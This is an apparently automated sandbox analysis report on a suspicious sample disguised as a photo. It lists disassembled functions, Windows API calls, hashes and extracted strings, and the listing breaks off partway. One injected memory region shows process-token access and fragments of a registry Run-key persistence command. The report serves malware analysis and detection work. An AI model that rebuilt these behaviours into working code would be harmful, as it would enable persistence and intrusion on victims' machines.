                                                                  • Part of subcall function 024718EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02471E69
                                                                  • Part of subcall function 024718EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 02471E87
                                                                  • Part of subcall function 024718EE: CloseHandle.KERNEL32(?), ref: 02471E94
                                                                  • Part of subcall function 024718EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02472101
                                                                  • Part of subcall function 024718EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 0247211F
                                                                  • Part of subcall function 024718EE: CloseHandle.KERNEL32(?), ref: 0247212C
                                                                  • Part of subcall function 0247238C: __EH_prolog3_GS.LIBCMT ref: 02472396
                                                                  • Part of subcall function 0247238C: CoInitializeEx.COMBASE(00000000,00000000), ref: 0247239F
                                                                  • Part of subcall function 0247238C: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 024723B1
                                                                  • Part of subcall function 0247238C: CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 024723CB
                                                                  • Part of subcall function 0247238C: VariantInit.OLEAUT32(?), ref: 024723D8
                                                                  • Part of subcall function 0247238C: VariantInit.OLEAUT32(?), ref: 024723F8
                                                                  • Part of subcall function 0247238C: VariantInit.OLEAUT32(?), ref: 02472415
                                                                  • Part of subcall function 0247238C: VariantInit.OLEAUT32(?), ref: 02472432
                                                                • RegOpenKeyExA.ADVAPI32(80000001,10019800,00000000,000F003F,?), ref: 0247440B
                                                                • RegSetValueExA.ADVAPI32(?,10019830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 0247443D
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000F1), ref: 02474449
                                                                • Sleep.KERNEL32(000003E8), ref: 0247445F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$OpenSleep$Processwsprintf$CloseInitVariant$FileHandleToken_rand$CreateH_prolog3_Initialize__time64$AddressAtomDebugFindGlobalInstanceLibraryLoadOutputProcReadSecuritySizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s
                                                                • String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
                                                                • API String ID: 910925969-526106949
                                                                • Opcode ID: 62a793b019d441827b141c2a1fc1b299d8a782e43d538f265309815979e85cbb
                                                                • Instruction ID: aad6e78a8c42e17cadb4a4ee883662e21dc8e6464c50ea43019f2c5d5abe6295
                                                                • Opcode Fuzzy Hash: 62a793b019d441827b141c2a1fc1b299d8a782e43d538f265309815979e85cbb
                                                                • Instruction Fuzzy Hash: 1AA28E7254C3C4AEE331EB649845BEFB7E9EFC4700F00482EE5988B290E7B19945CB56
                                                                Function 0041361E Relevance: 167.7, APIs: 93, Strings: 2, Instructions: 1497windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00413628
                                                                • GetCursorPos.USER32(00000000), ref: 004137D5
                                                                • ScreenToClient.USER32(?,00000000), ref: 004137E4
                                                                • GetTickCount.KERNEL32 ref: 00413869
                                                                • GetTickCount.KERNEL32 ref: 004138B5
                                                                • GetWindow.USER32(?,00000004), ref: 00413907
                                                                • SetFocus.USER32(00000000), ref: 00413912
                                                                • GetUpdateRect.USER32(?,?,00000000), ref: 00413994
                                                                • _memset.LIBCMT ref: 004139B7
                                                                • BeginPaint.USER32(?,?,?,00000000,?,?,?,?,3D09168B), ref: 004139C8
                                                                • EndPaint.USER32(?,?,?,?,?,00000000,?,?,?,?,3D09168B), ref: 004139D7
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004139F3
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00413A09
                                                                • GetClientRect.USER32(?,?), ref: 00413A29
                                                                • _memset.LIBCMT ref: 00413A3F
                                                                • BeginPaint.USER32(?,?,?,00000000,?,?,?,?,3D09168B), ref: 00413A50
                                                                • DeleteDC.GDI32(?), ref: 00413A5E
                                                                • DeleteObject.GDI32(?), ref: 00413A72
                                                                • IsRectEmpty.USER32(?), ref: 00413A95
                                                                • DeleteDC.GDI32(?), ref: 00413AB6
                                                                • DeleteObject.GDI32(?), ref: 00413AC4
                                                                • CreateCompatibleDC.GDI32(?), ref: 00413B87
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00413BAD
                                                                • SelectObject.GDI32(?,?), ref: 00413BBC
                                                                • _memmove.LIBCMT ref: 00413BE4
                                                                • GetWindowRect.USER32(?,00000000), ref: 00413C40
                                                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,?,00000000,01FF0000,00000002), ref: 00413CCA
                                                                • GetClientRect.USER32(?,00000000), ref: 00413D00
                                                                • IsRectEmpty.USER32(00000000), ref: 00413D0A
                                                                • DeleteDC.GDI32(?), ref: 00413D3D
                                                                • DeleteObject.GDI32(?), ref: 00413D4B
                                                                • GetClientRect.USER32(?,00000000), ref: 00413E15
                                                                • CreateCompatibleDC.GDI32(?), ref: 00413E1E
                                                                • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 00413E44
                                                                • _memset.LIBCMT ref: 00413E5F
                                                                • BeginPaint.USER32(?,?,?,00000000,?,?,?,?,3D09168B), ref: 00413E70
                                                                • SelectObject.GDI32(?,?), ref: 00413E8F
                                                                • SaveDC.GDI32(?), ref: 00413E9A
                                                                • RestoreDC.GDI32(?,?), ref: 00413EF2
                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00413F38
                                                                • SelectObject.GDI32(?,?), ref: 00413F47
                                                                • SelectObject.GDI32(?), ref: 00413F5B
                                                                • GetStockObject.GDI32(00000005), ref: 00413F61
                                                                • SelectObject.GDI32(?,00000000), ref: 00413F6E
                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 00413F82
                                                                • SelectObject.GDI32(?,00000000), ref: 00413F8F
                                                                • SaveDC.GDI32(?), ref: 00413F99
                                                                • RestoreDC.GDI32(?,00000000), ref: 00413FC0
                                                                • EndPaint.USER32(?,?,?,?,?,00000000,?,?,?,?,3D09168B), ref: 00413FCF
                                                                • ShowWindow.USER32(?,00000005,?,?,?,?,?,00000000,?,?,?,?,3D09168B), ref: 00413FF0
                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?,?,00000000,?,?,?,?,3D09168B), ref: 00414002
                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?,?,00000000,?,?,?,?,3D09168B), ref: 00414017
                                                                • GetTickCount.KERNEL32 ref: 00414039
                                                                • SendMessageW.USER32(3D09168B,00002111,?,3D09168B), ref: 0041407E
                                                                • GetTickCount.KERNEL32 ref: 004140FF
                                                                • GetTickCount.KERNEL32 ref: 00414148
                                                                • GetTickCount.KERNEL32 ref: 004141A4
                                                                • ScreenToClient.USER32(?,?), ref: 004141E3
                                                                • GetTickCount.KERNEL32 ref: 004142A3
                                                                • SetFocus.USER32(?,000002A0,0041206C,?,?,3D09168B), ref: 0041430C
                                                                • SetCapture.USER32(?,?,?,?,000002A0,0041206C,?,?,3D09168B), ref: 00414355
                                                                • GetTickCount.KERNEL32 ref: 00414393
                                                                • GetTickCount.KERNEL32 ref: 0041440E
                                                                • SetFocus.USER32(?,000002A0,0041206C,?,?,3D09168B), ref: 00414431
                                                                • SetCapture.USER32(?,?,000002A0,0041206C,?,?,3D09168B), ref: 0041448D
                                                                • GetTickCount.KERNEL32 ref: 004144D6
                                                                • SendMessageW.USER32(?,00000415,00000003,00000000), ref: 00414520
                                                                • _TrackMouseEvent.COMCTL32(00000010), ref: 0041452D
                                                                • GetTickCount.KERNEL32 ref: 0041458F
                                                                • SendMessageW.USER32(?,00000411,00000000,?), ref: 004145D4
                                                                • SetFocus.USER32(?,000002A0,0041206C,?,?,3D09168B), ref: 00414656
                                                                • SetCapture.USER32(?,?,000002A0,0041206C,?,?,3D09168B), ref: 004146AF
                                                                • GetClientRect.USER32(?,00000000), ref: 0041475C
                                                                • SaveDC.GDI32(?), ref: 00414768
                                                                • GetWindow.USER32(?,00000005), ref: 0041479A
                                                                • GetWindowRect.USER32(00000000,00000000), ref: 004147C6
                                                                • MapWindowPoints.USER32(00000000,?,00000000,00000002), ref: 004147D6
                                                                • SetWindowOrgEx.GDI32(?,00000000,?,00000000), ref: 004147F0
                                                                • SendMessageW.USER32(00000000,00000317,?,?), ref: 00414808
                                                                • GetWindow.USER32(00000000,00000002), ref: 00414811
                                                                • RestoreDC.GDI32(?,?), ref: 00414829
                                                                • SendMessageW.USER32(?,00000411,00000000,?), ref: 0041484D
                                                                • SendMessageW.USER32(?,00000200,00000000,000000FF), ref: 00414863
                                                                • GetTickCount.KERNEL32 ref: 004148C3
                                                                • _memset.LIBCMT ref: 0041491A
                                                                • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,?,00000000,00000000), ref: 00414985
                                                                • SendMessageW.USER32(00000000,00000432,00000000,?), ref: 00414999
                                                                • SendMessageW.USER32(00000000,00000418,00000000,00000000), ref: 004149B7
                                                                • SendMessageW.USER32(00000000,00000436,00000000,?), ref: 004149C6
                                                                • SendMessageW.USER32(00000000,00000411,00000001,?), ref: 004149D6
                                                                • ScreenToClient.USER32(?,?), ref: 004149F9
                                                                • GetTickCount.KERNEL32 ref: 00414A6D
                                                                • SendMessageW.USER32(?,00000200,00000000,?), ref: 00414A9B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountTick$Window$MessageRectSend$Object$Client$DeleteSelect$CreatePaint$CompatibleFocus_memset$BeginCaptureRestoreSaveScreen$BitmapEmptyInvalidateLongUpdate$CursorEventH_prolog3_LayeredMousePointsRectangleShowStockTrack_memmove
                                                                • String ID: tooltips_class32$windowinit
                                                                • API String ID: 1616569539-1250824750
                                                                • Opcode ID: b3b841abe47c039354637e13740bcfdd779307ffee8b637548312f8712c50014
                                                                • Instruction ID: 3815306fd7c88338399607d0ac37035099433f19ca361ff342aa6e9ad1532bdd
                                                                • Opcode Fuzzy Hash: b3b841abe47c039354637e13740bcfdd779307ffee8b637548312f8712c50014
                                                                • Instruction Fuzzy Hash: ADD28C74900218DFDF54DF68C888BEABBB5FF49301F1440AAE809AB265DB749E85CF54
                                                                Function 0040E805 Relevance: 93.5, APIs: 20, Strings: 33, Instructions: 761COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __wcstoi64_memmove
                                                                • String ID: format$format$freshicon$freshicon$gray$gray$min$min$murl$murl$noforce$noforce$patchurl$patchurl$predl$predl$reboot$reqscriptver$reqscriptver$rsize1$rsize1$rsize2$rsize2$sha1$sha1$silent$silent$size$size$url$url$usize$usize
                                                                • API String ID: 3802750240-1852597893
                                                                • Opcode ID: f3bc65a8d0e8d493b84763708df7973e68e212c378ab918a26643c7de2194c8d
                                                                • Instruction ID: 80cc683150b7c69ed6ee093a3236ae898c49c9e63de542a42b8be9043292508f
                                                                • Opcode Fuzzy Hash: f3bc65a8d0e8d493b84763708df7973e68e212c378ab918a26643c7de2194c8d
                                                                • Instruction Fuzzy Hash: 345283725043449EC720BE26C88176FBBD4AB85318F044E3FF9A5A32D2D7798949CB5B
                                                                Function 00403B0D Relevance: 93.5, APIs: 9, Strings: 44, Instructions: 706windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004126AC: GetSystemMetrics.USER32(0000000C), ref: 004126C3
                                                                  • Part of subcall function 004126AC: GetSystemMetrics.USER32(0000000B), ref: 004126CE
                                                                  • Part of subcall function 004126AC: LoadImageW.USER32(00000000,00000065,00000001,-0000000F), ref: 004126E2
                                                                  • Part of subcall function 004126AC: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004126F8
                                                                  • Part of subcall function 004126AC: GetSystemMetrics.USER32(0000000C), ref: 00412706
                                                                  • Part of subcall function 004126AC: GetSystemMetrics.USER32(0000000B), ref: 00412711
                                                                  • Part of subcall function 004126AC: LoadImageW.USER32(?,00000065,00000001,-0000000F), ref: 00412721
                                                                  • Part of subcall function 004126AC: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00412731
                                                                • GetSystemMenu.USER32(?,00000000), ref: 00403B1D
                                                                • EnableMenuItem.USER32(00000000,0000F060,00000003), ref: 00403B2B
                                                                  • Part of subcall function 00401478: __EH_prolog3.LIBCMT ref: 0040147F
                                                                  • Part of subcall function 0044D1A0: GetFileAttributesW.KERNEL32(?,00000000,000000FF,3D09168B,0000002C,?,00000000,?,?,?,?,?,?,00000000,0059ED68,000000FF), ref: 0044D208
                                                                  • Part of subcall function 0044D1A0: _memmove.LIBCMT ref: 0044D268
                                                                • GetCurrentProcessId.KERNEL32 ref: 00405795
                                                                • _wcslen.LIBCMT ref: 004057E6
                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                  • Part of subcall function 004014B3: __EH_prolog3.LIBCMT ref: 004014BA
                                                                  • Part of subcall function 004014B3: _wcslen.LIBCMT ref: 004014E6
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                • _memset.LIBCMT ref: 0040597A
                                                                • GetPrivateProfileStringW.KERNEL32(Config,ZmStartFail,005FC63C,?,00000104,?), ref: 004059B4
                                                                • GetPrivateProfileStringW.KERNEL32(Setting,Version,005FC63C,?,00000104,?), ref: 00405A5F
                                                                • _wcslen.LIBCMT ref: 00405BEB
                                                                • SetTimer.USER32(?,00000013,00000BB8,00000000), ref: 00405ADF
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: System$Metrics_wcslen$H_prolog3ImageLoadMenuMessagePrivateProfileSendString_memmove$AttributesCurrentEnableFileItemProcessTimerXinvalid_argument_memsetstd::_
                                                                • String ID: --tgid $%s -i "%d" -d$%s%u$2.1.784$Config$MainDlg.cpp$Setting$Version$ZmStartFail$\%s$_new$about_free$about_protocol$about_protocol_default$btn_agreement$btn_agreement1$btn_agreement2$btn_close$btn_free$btn_free1$btn_install$btn_min$btn_select$change_ad$click$edit_input$hlayout_install$https://zmconfig.duoyi.com/dyminiinstall.txt$https://zmconfig.duoyi.com/test/dyinstall_public.txt$https://zmconfig.duoyi.com/test/dyinstall_public_test.txt$https://zmweb.duoyi.com/zm/protocol/list$language_combo$lb_download$lb_tip$lb_tip1$lb_tip2$opt_agree$opt_agree1$opt_auto$preference.ini$pro_InstallProgress$tb_main$vlt_bk$ywupdate.ini
                                                                • API String ID: 2296424297-1143761170
                                                                • Opcode ID: d37a887e426f0f54f5d6cb049a1eed39eeaaae8533107fab295c4c658f5688d1
                                                                • Instruction ID: 26db1c0656ba5c85f50b49e0151f86bba6e55d3f67c57ad8de536ce0afb894f7
                                                                • Opcode Fuzzy Hash: d37a887e426f0f54f5d6cb049a1eed39eeaaae8533107fab295c4c658f5688d1
                                                                • Instruction Fuzzy Hash: 7A52B1715047449FE720EB61C886BEBB7E5EF80304F00093FB699A71D1DB78A945CB6A
                                                                Function 004227C2 Relevance: 85.0, APIs: 5, Strings: 43, Instructions: 989COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004227CC
                                                                • _memset.LIBCMT ref: 004228B8
                                                                • __fassign.LIBCMT ref: 004228EB
                                                                  • Part of subcall function 0048EEB6: wcstoxl.LIBCMT ref: 0048EEC6
                                                                • __fassign.LIBCMT ref: 0042296A
                                                                • _wcslen.LIBCMT ref: 00422B75
                                                                  • Part of subcall function 00417E37: __EH_prolog3_GS.LIBCMT ref: 00417E41
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                  • Part of subcall function 00444AB5: _memset.LIBCMT ref: 00444AF5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3___fassign_memset$_malloc_wcslenwcstoxl
                                                                • String ID: $0r`$ActiveX$Button$CheckBox$ChildLayout$Combo$ComboBox$Container$Control$DateTime$Default$Edit$ExpandList$Flash$Font$HorizontalLayout$IContainer$Image$Include$Label$List$ListContainerElement$ListHeader$ListHeaderItem$ListLabelElement$ListTextElement$Menu$Option$Progress$RichEdit$ScrollBar$Slider$TabLayout$Text$TileLayout$TreeNode$TreeNodeUI$TreeView$VerticalLayout$WebBrowser$count$source
                                                                • API String ID: 3539388181-1283931432
                                                                • Opcode ID: 0961ea6adf8c12e439312d99fdd748f054630d322624ee4a0358d84cff693a33
                                                                • Instruction ID: 3e290e34dc1c84dfb62f446027c3d5b7c73b61f27cc492680af59f84bf9b28a1
                                                                • Opcode Fuzzy Hash: 0961ea6adf8c12e439312d99fdd748f054630d322624ee4a0358d84cff693a33
                                                                • Instruction Fuzzy Hash: B672F631A40325AADB24AF25AD01B9E77F4BF04718F5440AFF404A6291DFBC9E819F9D
                                                                Function 0040638A Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 486registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 004063FF
                                                                • _wcslen.LIBCMT ref: 00406429
                                                                • _wcslen.LIBCMT ref: 00406443
                                                                • GetPrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,InstallPath,005FC63C,?,00000800,?), ref: 004064B9
                                                                • PathFileExistsW.SHLWAPI(?,3D09168B,about_protocol,about_protocol_default), ref: 004064E1
                                                                • _wcslen.LIBCMT ref: 004064F2
                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\DuoyiLauncher,00000000,00020019,?,3D09168B,about_protocol,about_protocol_default), ref: 00406584
                                                                • _memset.LIBCMT ref: 004065A6
                                                                • _wcslen.LIBCMT ref: 004065E1
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,00001000), ref: 00406626
                                                                • _wcslen.LIBCMT ref: 0040664E
                                                                • _wcslen.LIBCMT ref: 0040665F
                                                                • PathAppendW.SHLWAPI(?,DuoyiLauncher.exe), ref: 00406688
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406695
                                                                • _wcslen.LIBCMT ref: 004066AD
                                                                • _wcslen.LIBCMT ref: 00406748
                                                                • RegCloseKey.ADVAPI32(?), ref: 004067F7
                                                                • _wcslen.LIBCMT ref: 0040683B
                                                                • GetPrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,InstallPath,005FC63C,?,00000800,?), ref: 004068B1
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004068D5
                                                                • _wcslen.LIBCMT ref: 004068E6
                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\DuoyiLauncher,00000000,00020019,?), ref: 00406958
                                                                • _memset.LIBCMT ref: 0040697A
                                                                • _wcslen.LIBCMT ref: 004069AF
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,00001000), ref: 004069F4
                                                                • _wcslen.LIBCMT ref: 00406A1B
                                                                • _wcslen.LIBCMT ref: 00406A2C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406A50
                                                                • PathAppendW.SHLWAPI(?,DuoyiLauncher.exe), ref: 00406A62
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406A6F
                                                                • _wcslen.LIBCMT ref: 00406A83
                                                                  • Part of subcall function 00401560: _memmove.LIBCMT ref: 00401581
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00406AB7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Path$ExistsFile$_memset$AppendCloseOpenPrivateProfileQueryStringValue_memmove
                                                                • String ID: Duoyi.com-Launcher$DuoyiLauncher.exe$InstPath$InstallPath$SOFTWARE\DuoyiLauncher$Software\DuoyiLauncher$TestInstallPath$\$\DuoyiLaucher.ini$\DuoyiLauncher$about_protocol
                                                                • API String ID: 112744254-3847963025
                                                                • Opcode ID: 8369103dc35a81a843cf310754466058ff697d98f70e69354929883b55e35751
                                                                • Instruction ID: 9935920f3288aa5b1cddea8f1a1cfa622d370ee0fef8e845a98a67607b1e93df
                                                                • Opcode Fuzzy Hash: 8369103dc35a81a843cf310754466058ff697d98f70e69354929883b55e35751
                                                                • Instruction Fuzzy Hash: 2712A172900328AADB21EB64CC49BDE77B9BB04304F1044EBE509B7192DB785ED9CF65
                                                                Function 00410B80 Relevance: 54.6, APIs: 19, Strings: 12, Instructions: 303COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0045F6C0: _wcslen.LIBCMT ref: 0045F71D
                                                                • _memset.LIBCMT ref: 00410D0E
                                                                • GetPrivateProfileStringW.KERNEL32(Install,Url,005FC63C,?,00000800,?), ref: 00410D3E
                                                                • _wcslen.LIBCMT ref: 00410D47
                                                                • GetPrivateProfileStringW.KERNEL32(Install,murl,005FC63C,?,00000800,?), ref: 00410D81
                                                                • _wcslen.LIBCMT ref: 00410D8A
                                                                • GetPrivateProfileStringW.KERNEL32(Install,Size,005FC63C,?,00000800,?), ref: 00410DC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
